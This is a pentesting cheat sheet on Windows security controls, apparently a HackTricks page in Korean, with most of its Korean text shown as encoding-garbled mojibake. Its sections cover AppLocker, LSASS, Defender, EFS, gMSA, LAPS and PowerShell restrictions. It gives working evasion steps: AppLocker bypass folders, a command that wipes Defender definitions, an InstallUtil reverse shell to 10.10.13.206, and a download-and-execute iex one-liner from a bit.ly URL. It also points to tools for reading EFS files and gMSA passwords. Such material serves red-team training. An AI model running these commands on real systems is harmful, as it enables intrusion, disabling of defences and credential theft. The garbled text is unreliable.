Windows Security Controls
Tip
AWS ν΄νΉ λ°°μ°κΈ° λ° μ°μ΅νκΈ°:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ν΄νΉ λ°°μ°κΈ° λ° μ°μ΅νκΈ°:HackTricks Training GCP Red Team Expert (GRTE)
Azure ν΄νΉ λ°°μ°κΈ° λ° μ°μ΅νκΈ°:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks μ§μνκΈ°
- ꡬλ κ³ν νμΈνκΈ°!
- **π¬ λμ€μ½λ κ·Έλ£Ή λλ ν λ κ·Έλ¨ κ·Έλ£Ήμ μ°Έμ¬νκ±°λ νΈμν° π¦ @hacktricks_liveλ₯Ό νλ‘μ°νμΈμ.
- HackTricks λ° HackTricks Cloud κΉνλΈ λ¦¬ν¬μ§ν 리μ PRμ μ μΆνμ¬ ν΄νΉ νΈλ¦μ 곡μ νμΈμ.
AppLocker Policy
μ ν리μΌμ΄μ νμ΄νΈλ¦¬μ€νΈλ μμ€ν μμ μ‘΄μ¬νκ³ μ€νλ μ μλ μΉμΈλ μννΈμ¨μ΄ μ ν리μΌμ΄μ λλ μ€ν νμΌμ λͺ©λ‘μ λλ€. λͺ©νλ νκ²½μ μ ν΄ν 맬μ¨μ΄μ νΉμ μ‘°μ§μ λΉμ¦λμ€ μꡬμ λ§μ§ μλ μΉμΈλμ§ μμ μννΈμ¨μ΄λ‘λΆν° 보νΈνλ κ²μ λλ€.
AppLockerλ Microsoftμ μ ν리μΌμ΄μ
νμ΄νΈλ¦¬μ€νΈ μ루μ
μΌλ‘, μμ€ν
κ΄λ¦¬μκ° μ¬μ©μκ° μ€νν μ μλ μ ν리μΌμ΄μ
λ° νμΌμ μ μ΄ν μ μκ² ν΄μ€λλ€. μ΄λ μ€ν νμΌ, μ€ν¬λ¦½νΈ, Windows μ€μΉ νμΌ, DLL, ν¨ν€μ§ μ± λ° ν¨ν€μ§ μ± μ€μΉ νλ‘κ·Έλ¨μ λν μΈλΆμ μΈ μ μ΄λ₯Ό μ 곡ν©λλ€.
μ‘°μ§μμ cmd.exe λ° PowerShell.exeμ νΉμ λλ ν°λ¦¬μ λν μ°κΈ° μ κ·Όμ μ°¨λ¨νλ κ²μ΄ μΌλ°μ μ΄μ§λ§, μ΄λ λͺ¨λ μ°νλ μ μμ΅λλ€.
Check
λΈλ리μ€νΈ/νμ΄νΈλ¦¬μ€νΈμ μλ νμΌ/νμ₯μλ₯Ό νμΈνμΈμ:
Get-ApplockerPolicy -Effective -xml
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
$a = Get-ApplockerPolicy -effective
$a.rulecollections
μ΄ λ μ§μ€νΈλ¦¬ κ²½λ‘λ AppLockerμ μν΄ μ μ©λ κ΅¬μ± λ° μ μ± μ ν¬ν¨νκ³ μμΌλ©°, μμ€ν μμ μνλλ νμ¬ κ·μΉ μ§ν©μ κ²ν ν μ μλ λ°©λ²μ μ 곡ν©λλ€:
HKLM\Software\Policies\Microsoft\Windows\SrpV2
μ°ν
- AppLocker μ μ±
μ μ°ννκΈ° μν μ μ©ν μ°κΈ° κ°λ₯ν ν΄λ: AppLockerκ°
C:\Windows\System32λλC:\Windowsλ΄μ λͺ¨λ κ²μ μ€ννλλ‘ νμ©νλ κ²½μ°, μ΄λ₯Ό **μ°ννκΈ° μν΄ μ¬μ©ν μ μλ μ°κΈ° κ°λ₯ν ν΄λκ° μμ΅λλ€.
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\windows\tracing
- μΌλ°μ μΌλ‘ μ λ’°ν μ μλ βLOLBASβsβ λ°μ΄λ리λ AppLockerλ₯Ό μ°ννλ λ° μ μ©ν μ μμ΅λλ€.
- μλͺ» μμ±λ κ·μΉλ μ°νλ μ μμ΅λλ€.
- μλ₯Ό λ€μ΄,
<FilePathCondition Path="%OSDRIVE%*\allowed*"/>, μ΄λμλ **allowed**λΌλ ν΄λλ₯Ό μμ±νλ©΄ νμ©λ©λλ€. - μ‘°μ§μ μ’
μ’
%System32%\WindowsPowerShell\v1.0\powershell.exeμ€ν νμΌμ μ°¨λ¨νλ λ° μ§μ€νμ§λ§, λ€λ₯Έ PowerShell μ€ν νμΌ μμΉμΈ%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exeλλPowerShell_ISE.exeλ₯Ό μμ΄λ²λ¦½λλ€. - DLL κ°μ μ μ©μ μμ€ν μ μΆκ°μ μΈ λΆνλ₯Ό μ€ μ μκΈ° λλ¬Έμ λ§€μ° λλ¬Όκ² νμ±νλ©λλ€. λ°λΌμ λ°±λμ΄λ‘μ DLLμ μ¬μ©νλ κ²μ΄ AppLockerλ₯Ό μ°ννλ λ° λμμ΄ λ©λλ€.
- ReflectivePick λλ SharpPickλ₯Ό μ¬μ©νμ¬ Powershell μ½λλ₯Ό μ΄λ€ νλ‘μΈμ€μμλ μ€ννκ³ AppLockerλ₯Ό μ°νν μ μμ΅λλ€. μμΈν λ΄μ©μ λ€μμ νμΈνμΈμ: https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode.
μ격 μ¦λͺ μ μ₯μ
보μ κ³μ κ΄λ¦¬μ (SAM)
λ‘컬 μ격 μ¦λͺ μ μ΄ νμΌμ μ‘΄μ¬νλ©°, λΉλ°λ²νΈλ ν΄μ μ²λ¦¬λ©λλ€.
λ‘컬 보μ κΆν (LSA) - LSASS
μ격 μ¦λͺ
(ν΄μ μ²λ¦¬λ¨)μ λ¨μΌ λ‘κ·ΈμΈ μ΄μ λ‘ μ΄ νμ μμ€ν
μ λ©λͺ¨λ¦¬μ μ μ₯λ©λλ€.
LSAλ λ‘컬 보μ μ μ±
(λΉλ°λ²νΈ μ μ±
, μ¬μ©μ κΆν λ±), μΈμ¦, μ‘μΈμ€ ν ν° λ±μ κ΄λ¦¬ν©λλ€.
LSAλ SAM νμΌ λ΄μμ μ 곡λ μ격 μ¦λͺ
μ νμΈνκ³ λλ©μΈ μ¬μ©μλ₯Ό μΈμ¦νκΈ° μν΄ λλ©μΈ 컨νΈλ‘€λ¬μ ν΅μ ν©λλ€.
μ격 μ¦λͺ μ νλ‘μΈμ€ LSASS λ΄μ μ μ₯λ©λλ€: Kerberos ν°μΌ, NT λ° LM ν΄μ, μ½κ² 볡νΈνλ λΉλ°λ²νΈ.
LSA λΉλ°
LSAλ λμ€ν¬μ μΌλΆ μ격 μ¦λͺ μ μ μ₯ν μ μμ΅λλ€:
- Active Directoryμ μ»΄ν¨ν° κ³μ λΉλ°λ²νΈ (λλ¬ν μ μλ λλ©μΈ 컨νΈλ‘€λ¬).
- Windows μλΉμ€ κ³μ μ λΉλ°λ²νΈ
- μμ½λ μμ μ λΉλ°λ²νΈ
- κΈ°ν (IIS μ ν리μΌμ΄μ μ λΉλ°λ²νΈβ¦)
NTDS.dit
Active Directoryμ λ°μ΄ν°λ² μ΄μ€μ λλ€. λλ©μΈ 컨νΈλ‘€λ¬μλ§ μ‘΄μ¬ν©λλ€.
Defender
Microsoft Defenderλ Windows 10 λ° Windows 11, κ·Έλ¦¬κ³ Windows Server λ²μ μμ μ¬μ©ν μ μλ μν°λ°μ΄λ¬μ€μ
λλ€. μΌλ°μ μΈ νν
μ€ν
λκ΅¬μΈ **WinPEAS**λ₯Ό μ°¨λ¨ν©λλ€. κ·Έλ¬λ μ΄λ¬ν 보νΈλ₯Ό μ°ννλ λ°©λ²μ΄ μμ΅λλ€.
νμΈ
Defenderμ μνλ₯Ό νμΈνλ €λ©΄ PS cmdlet **Get-MpComputerStatus**λ₯Ό μ€νν μ μμ΅λλ€ (νμ±ν μ¬λΆλ₯Ό μκΈ° μν΄ RealTimeProtectionEnabled κ°μ νμΈνμΈμ):
PS C:\> Get-MpComputerStatus
[...]
AntispywareEnabled : True
AntispywareSignatureAge : 1
AntispywareSignatureLastUpdated : 12/6/2021 10:14:23 AM
AntispywareSignatureVersion : 1.323.392.0
AntivirusEnabled : True
[...]
NISEnabled : False
NISEngineVersion : 0.0.0.0
[...]
RealTimeProtectionEnabled : True
RealTimeScanDirection : 0
PSComputerName :
μ΄κ±°νλ €λ©΄ λ€μμ μ€νν μλ μμ΅λλ€:
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
wmic /namespace:\\root\securitycenter2 path antivirusproduct
sc query windefend
#Delete all rules of Defender (useful for machines without internet access)
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Encrypted File System (EFS)
EFSλ λμΉ ν€μΈ **νμΌ μνΈν ν€ (FEK)**λ₯Ό μ¬μ©νμ¬ νμΌμ μνΈννμ¬ λ³΄νΈν©λλ€. μ΄ ν€λ μ¬μ©μμ κ³΅κ° ν€λ‘ μνΈνλμ΄ μνΈνλ νμΌμ $EFS λ체 λ°μ΄ν° μ€νΈλ¦Όμ μ μ₯λ©λλ€. 볡νΈνκ° νμν λ, μ¬μ©μμ λμ§νΈ μΈμ¦μμ ν΄λΉνλ κ°μΈ ν€λ₯Ό μ¬μ©νμ¬ $EFS μ€νΈλ¦Όμμ FEKλ₯Ό 볡νΈνν©λλ€. λ λ§μ μΈλΆμ 보λ μ¬κΈ°μμ νμΈν μ μμ΅λλ€.
μ¬μ©μ κ°μ μμ΄ λ³΅νΈνλλ μλ리μ€λ λ€μκ³Ό κ°μ΅λλ€:
- νμΌμ΄λ ν΄λκ° FAT32μ κ°μ λΉ EFS νμΌ μμ€ν μΌλ‘ μ΄λλ λ μλμΌλ‘ 볡νΈνλ©λλ€.
- SMB/CIFS νλ‘ν μ½μ ν΅ν΄ λ€νΈμν¬λ‘ μ μ‘λ μνΈνλ νμΌμ μ μ‘ μ μ 볡νΈνλ©λλ€.
μ΄ μνΈν λ°©λ²μ μμ μμκ² μνΈνλ νμΌμ λν ν¬λͺ ν μ κ·Όμ νμ©ν©λλ€. κ·Έλ¬λ μμ μμ λΉλ°λ²νΈλ₯Ό λ¨μν λ³κ²½νκ³ λ‘κ·ΈμΈνλ κ²λ§μΌλ‘λ 볡νΈνκ° νμ©λμ§ μμ΅λλ€.
μ£Όμ μμ :
- EFSλ μ¬μ©μμ κ³΅κ° ν€λ‘ μνΈνλ λμΉ FEKλ₯Ό μ¬μ©ν©λλ€.
- 볡νΈνλ μ¬μ©μμ κ°μΈ ν€λ₯Ό μ¬μ©νμ¬ FEKμ μ κ·Όν©λλ€.
- FAT32λ‘ λ³΅μ¬νκ±°λ λ€νΈμν¬ μ μ‘κ³Ό κ°μ νΉμ 쑰건μμ μλ 볡νΈνκ° λ°μν©λλ€.
- μνΈνλ νμΌμ μΆκ° λ¨κ³ μμ΄ μμ μκ° μ κ·Όν μ μμ΅λλ€.
EFS μ 보 νμΈ
μ¬μ©μκ° μ΄ μλΉμ€λ₯Ό μ¬μ©νλμ§ νμΈνλ €λ©΄ μ΄ κ²½λ‘κ° μ‘΄μ¬νλμ§ νμΈνμΈμ: C:\users\<username>\appdata\roaming\Microsoft\Protect
νμΌμ μ κ·Όν μ μλ μ¬λμ νμΈνλ €λ©΄ cipher /c \<file>\λ₯Ό μ¬μ©νμΈμ. λν ν΄λ λ΄μμ cipher /e λ° cipher /dλ₯Ό μ¬μ©νμ¬ λͺ¨λ νμΌμ μνΈννκ³ λ³΅νΈνν μ μμ΅λλ€.
EFS νμΌ λ³΅νΈν
κΆν μμ€ν μ΄ λκΈ°
μ΄ λ°©λ²μ νΌν΄μ μ¬μ©μκ° νΈμ€νΈ λ΄μμ νλ‘μΈμ€λ₯Ό μ€ννκ³ μμ΄μΌ ν©λλ€. κ·Έλ° κ²½μ°, meterpreter μΈμ
μ μ¬μ©νμ¬ μ¬μ©μμ νλ‘μΈμ€ ν ν°μ κ°μ₯ν μ μμ΅λλ€ (incognitoμ impersonate_token). λλ μ¬μ©μμ νλ‘μΈμ€λ‘ migrateν μ μμ΅λλ€.
μ¬μ©μμ λΉλ°λ²νΈ μκΈ°
howto ~ decrypt EFS files \xc2\xb7 gentilkiwi/mimikatz Wiki \xc2\xb7 GitHub
Group Managed Service Accounts (gMSA)
Microsoftλ IT μΈνλΌμμ μλΉμ€ κ³μ κ΄λ¦¬λ₯Ό λ¨μννκΈ° μν΄ **κ·Έλ£Ή κ΄λ¦¬ μλΉμ€ κ³μ (gMSA)**λ₯Ό κ°λ°νμ΅λλ€. μ ν΅μ μΈ μλΉμ€ κ³μ μ μ’ μ’ βλΉλ°λ²νΈ λ§λ£ μ ν¨β μ€μ μ΄ νμ±νλμ΄ μλ λ°λ©΄, gMSAλ λ³΄λ€ μμ νκ³ κ΄λ¦¬νκΈ° μ¬μ΄ μ루μ μ μ 곡ν©λλ€:
- μλ λΉλ°λ²νΈ κ΄λ¦¬: gMSAλ λλ©μΈ λλ μ»΄ν¨ν° μ μ± μ λ°λΌ μλμΌλ‘ λ³κ²½λλ 볡μ‘ν 240μ λΉλ°λ²νΈλ₯Ό μ¬μ©ν©λλ€. μ΄ κ³Όμ μ Microsoftμ ν€ λ°°ν¬ μλΉμ€ (KDC)κ° μ²λ¦¬νμ¬ μλ λΉλ°λ²νΈ μ λ°μ΄νΈμ νμμ±μ μμ±λλ€.
- κ°νλ 보μ: μ΄λ¬ν κ³μ μ μ κΈμ λ©΄μμ΄λ©° λνν λ‘κ·ΈμΈμ μν΄ μ¬μ©ν μ μμ΄ λ³΄μμ΄ κ°νλ©λλ€.
- λ€μ€ νΈμ€νΈ μ§μ: gMSAλ μ¬λ¬ νΈμ€νΈμμ 곡μ ν μ μμ΄ μ¬λ¬ μλ²μμ μ€νλλ μλΉμ€μ μ ν©ν©λλ€.
- μμ½ μμ κΈ°λ₯: κ΄λ¦¬ μλΉμ€ κ³μ κ³Ό λ¬λ¦¬ gMSAλ μμ½ μμ μ€νμ μ§μν©λλ€.
- λ¨μνλ SPN κ΄λ¦¬: μμ€ν μ μ»΄ν¨ν°μ sAMaccount μΈλΆμ 보 λλ DNS μ΄λ¦μ λ³κ²½μ΄ μμ λ μλΉμ€ 주체 μ΄λ¦ (SPN)μ μλμΌλ‘ μ λ°μ΄νΈνμ¬ SPN κ΄λ¦¬λ₯Ό λ¨μνν©λλ€.
gMSAμ λΉλ°λ²νΈλ LDAP μμ± _msDS-ManagedPassword_μ μ μ₯λλ©° λλ©μΈ 컨νΈλ‘€λ¬ (DC)μ μν΄ 30μΌλ§λ€ μλμΌλ‘ μ¬μ€μ λ©λλ€. μ΄ λΉλ°λ²νΈλ MSDS-MANAGEDPASSWORD_BLOBλ‘ μλ €μ§ μνΈνλ λ°μ΄ν° λΈλ‘μ΄λ©°, κΆνμ΄ μλ κ΄λ¦¬μμ gMSAκ° μ€μΉλ μλ²λ§ κ²μν μ μμ΄ μμ ν νκ²½μ 보μ₯ν©λλ€. μ΄ μ 보μ μ κ·Όνλ €λ©΄ LDAPSμ κ°μ 보μ μ°κ²°μ΄ νμνκ±°λ βSealing & Secureβλ‘ μΈμ¦λ μ°κ²°μ΄μ΄μΌ ν©λλ€.

μ΄ λΉλ°λ²νΈλ GMSAPasswordReaderλ‘ μ½μ μ μμ΅λλ€:
/GMSAPasswordReader --AccountName jkohler
μ΄ κ²μλ¬Όμμ λ λ§μ μ 보λ₯Ό μ°ΎμΌμΈμ
λν, gMSAμ λΉλ°λ²νΈλ₯Ό μ½κΈ° μν΄ NTLM 릴λ μ΄ κ³΅κ²©μ μννλ λ°©λ²μ λν μΉ νμ΄μ§λ₯Ό νμΈνμΈμ.
LAPS
**λ‘컬 κ΄λ¦¬μ λΉλ°λ²νΈ μ루μ (LAPS)**λ Microsoftμμ λ€μ΄λ‘λν μ μμΌλ©°, λ‘컬 κ΄λ¦¬μ λΉλ°λ²νΈ κ΄λ¦¬λ₯Ό κ°λ₯νκ² ν©λλ€. μ΄ λΉλ°λ²νΈλ 무μμνλκ³ , κ³ μ νλ©°, μ κΈ°μ μΌλ‘ λ³κ²½λλ©°, Active Directoryμ μ€μ μ§μ€μμΌλ‘ μ μ₯λ©λλ€. μ΄λ¬ν λΉλ°λ²νΈμ λν μ κ·Όμ ACLμ ν΅ν΄ κΆνμ΄ μλ μ¬μ©μλ‘ μ νλ©λλ€. μΆ©λΆν κΆνμ΄ λΆμ¬λλ©΄ λ‘컬 κ΄λ¦¬μ λΉλ°λ²νΈλ₯Ό μ½μ μ μλ κΈ°λ₯μ΄ μ 곡λ©λλ€.
PS μ μ½ μΈμ΄ λͺ¨λ
PowerShell μ μ½ μΈμ΄ λͺ¨λλ COM κ°μ²΄ μ°¨λ¨, μΉμΈλ .NET μ νλ§ νμ©, XAML κΈ°λ° μν¬νλ‘, PowerShell ν΄λμ€ λ± PowerShellμ ν¨κ³Όμ μΌλ‘ μ¬μ©νκΈ° μν΄ νμν λ§μ κΈ°λ₯μ μ νν©λλ€.
νμΈ
$ExecutionContext.SessionState.LanguageMode
#Values could be: FullLanguage or ConstrainedLanguage
μ°ν
#Easy bypass
Powershell -version 2
νμ¬ Windowsμμλ μ΄ μ°ν λ°©λ²μ΄ μλνμ§ μμ§λ§ PSByPassCLMλ₯Ό μ¬μ©ν μ μμ΅λλ€.
μ»΄νμΌνλ €λ©΄ λ€μμ΄ νμν μ μμ΅λλ€ μ°Έμ‘° μΆκ° -> μ°Ύμ보기 -> μ°Ύμ보기 -> C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0\31bf3856ad364e35\System.Management.Automation.dllμ μΆκ°νκ³ νλ‘μ νΈλ₯Ό .Net4.5λ‘ λ³κ²½νμμμ€.
μ§μ μ°ν:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /U c:\temp\psby.exe
리λ²μ€ μ Έ:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.13.206 /rport=443 /U c:\temp\psby.exe
ReflectivePick λλ SharpPickλ₯Ό μ¬μ©νμ¬ Powershell μ½λλ₯Ό λͺ¨λ νλ‘μΈμ€μμ μ€ννκ³ μ νλ λͺ¨λλ₯Ό μ°νν μ μμ΅λλ€. μμΈν λ΄μ©μ λ€μμ νμΈνμΈμ: https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode.
PS μ€ν μ μ±
κΈ°λ³Έμ μΌλ‘ μ νλ¨μΌλ‘ μ€μ λμ΄ μμ΅λλ€. μ΄ μ μ± μ μ°ννλ μ£Όμ λ°©λ²:
1ΒΊ Just copy and paste inside the interactive PS console
2ΒΊ Read en Exec
Get-Content .runme.ps1 | PowerShell.exe -noprofile -
3ΒΊ Read and Exec
Get-Content .runme.ps1 | Invoke-Expression
4ΒΊ Use other execution policy
PowerShell.exe -ExecutionPolicy Bypass -File .runme.ps1
5ΒΊ Change users execution policy
Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted
6ΒΊ Change execution policy for this session
Set-ExecutionPolicy Bypass -Scope Process
7ΒΊ Download and execute:
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://bit.ly/1kEgbuH')"
8ΒΊ Use command switch
Powershell -command "Write-Host 'My voice is my passport, verify me.'"
9ΒΊ Use EncodeCommand
$command = "Write-Host 'My voice is my passport, verify me.'" $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = [Convert]::ToBase64String($bytes) powershell.exe -EncodedCommand $encodedCommand
λ λ§μ λ΄μ©μ μ¬κΈ°μμ νμΈν μ μμ΅λλ€.
보μ μ§μ 곡κΈμ μΈν°νμ΄μ€ (SSPI)
μ¬μ©μλ₯Ό μΈμ¦νλ λ° μ¬μ©ν μ μλ APIμ λλ€.
SSPIλ ν΅μ νλ €λ λ λ¨Έμ μ μ ν©ν νλ‘ν μ½μ μ°Ύλ μν μ ν©λλ€. μ΄λ₯Ό μν μ νΈ λ°©λ²μ Kerberosμ λλ€. κ·Έλ° λ€μ SSPIλ μ¬μ©ν μΈμ¦ νλ‘ν μ½μ νμνλ©°, μ΄λ¬ν μΈμ¦ νλ‘ν μ½μ 보μ μ§μ 곡κΈμ(SSP)λΌκ³ νλ©°, κ° Windows λ¨Έμ λ΄μμ DLL ννλ‘ μ‘΄μ¬νκ³ λ λ¨Έμ λͺ¨λ λμΌν νλ‘ν μ½μ μ§μν΄μΌ ν΅μ ν μ μμ΅λλ€.
μ£Όμ SSP
- Kerberos: μ νΈλλ νλ‘ν μ½
- %windir%\Windows\System32\kerberos.dll
- NTLMv1 λ° NTLMv2: νΈνμ± μ΄μ
- %windir%\Windows\System32\msv1_0.dll
- Digest: μΉ μλ² λ° LDAP, MD5 ν΄μ ννμ λΉλ°λ²νΈ
- %windir%\Windows\System32\Wdigest.dll
- Schannel: SSL λ° TLS
- %windir%\Windows\System32\Schannel.dll
- Negotiate: μ¬μ©ν νλ‘ν μ½μ νμνλ λ° μ¬μ©λ©λλ€ (Kerberos λλ NTLM, κΈ°λ³Έκ°μ Kerberos)
- %windir%\Windows\System32\lsasrv.dll
νμμ μ¬λ¬ λ°©λ²μ μ 곡ν μ μκ±°λ νλλ§ μ 곡ν μ μμ΅λλ€.
UAC - μ¬μ©μ κ³μ 컨νΈλ‘€
μ¬μ©μ κ³μ 컨νΈλ‘€ (UAC)λ μΉκ²©λ νλμ λν λμ ν둬ννΈλ₯Ό νμ±ννλ κΈ°λ₯μ λλ€.
Tip
AWS ν΄νΉ λ°°μ°κΈ° λ° μ°μ΅νκΈ°:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ν΄νΉ λ°°μ°κΈ° λ° μ°μ΅νκΈ°:HackTricks Training GCP Red Team Expert (GRTE)
Azure ν΄νΉ λ°°μ°κΈ° λ° μ°μ΅νκΈ°:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks μ§μνκΈ°
- ꡬλ κ³ν νμΈνκΈ°!
- **π¬ λμ€μ½λ κ·Έλ£Ή λλ ν λ κ·Έλ¨ κ·Έλ£Ήμ μ°Έμ¬νκ±°λ νΈμν° π¦ @hacktricks_liveλ₯Ό νλ‘μ°νμΈμ.
- HackTricks λ° HackTricks Cloud κΉνλΈ λ¦¬ν¬μ§ν 리μ PRμ μ μΆνμ¬ ν΄νΉ νΈλ¦μ 곡μ νμΈμ.


